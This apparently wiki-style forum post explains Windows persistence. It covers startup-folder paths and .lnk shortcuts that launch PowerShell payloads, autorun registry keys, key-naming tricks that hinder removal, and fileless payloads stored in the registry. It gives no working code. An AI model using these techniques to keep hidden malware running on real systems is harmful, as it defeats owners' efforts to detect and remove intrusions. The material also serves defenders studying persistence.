Windows Persistence: Autorun Registry Keys and Startup Folder
So for the sake of inclusiveness I feel I have to include the most obvious and common methods of persistence. We will cover autorun registry keys as well as the startup folder which are still a staple in malware to this day. Since it is such a commonly known topic I will not be spending much time going in to detail and will instead link to external sources with more detail.
Probably the simplest method of gaining persistence used, this just involves dropping a file in to the windows startup folder of your choosing. The recent trend is to drop a shortcut (.lnk) file pointing to powershell with a payload contained in the arguments. The locations of the startup folders have changed between versions so make sure you are using the correct path as indicated for your Windows version. Files placed in these startup folders are listed in the start menu under "Startup".
C:\Documents and Settings\[Username]\Start Menu\Programs\Startup\
User startup folder on Windows XP.
C:\Documents and Settings\AllUsers\Start Menu\Programs\Startup\
Shared startup folder on Windows XP.
User startup folder on Windows 7 and newer.
Shared startup folder on Windows 7 and newer. Requires administrator privileges.
Autorun Registry Keys
Autorun registry key persistence is probably the most common method seen in the wild. It is also one of the easiest to clean up as often times it simply involves modifying the affected registry key and its values. Methods such as blank and unicode key names can be used to stymie the removal process as well as hide its existence from a user. It can also be used to achieve "fileless malware" by storing an encoded payload in a benign registry and placing powershell with a command argument that will decode and execute the payload in memory in an autorun key.
The following is a short list of a few commonly used registry keys. I have made this post a wiki so if you would like to see an additional key here, feel free to add it along with a short description.